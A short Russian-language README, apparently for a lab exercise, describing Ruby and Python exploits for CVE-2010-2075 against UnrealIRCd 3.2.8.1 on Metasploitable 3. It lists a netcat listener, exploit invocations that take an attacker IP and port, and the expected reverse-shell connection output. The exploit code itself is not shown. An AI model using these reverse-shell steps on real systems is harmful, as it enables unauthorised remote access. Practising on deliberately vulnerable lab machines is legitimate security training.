
Эксплойт на Ruby и Python для CVE-2010-2075, нацеленный на UnrealIRCd 3.2.8.1, обеспечивающий удалённый доступ через обратную оболочку на Metasploitable 3.
На шелле атакующего
nc -nlvp 1111
На шелле жертвы
ruby exploit.rb 127.0.0.1
Ожидаемый вывод на шелле атакующего
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
На шелле жертвы
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
На шелле атакующего
nc -nlvp 1111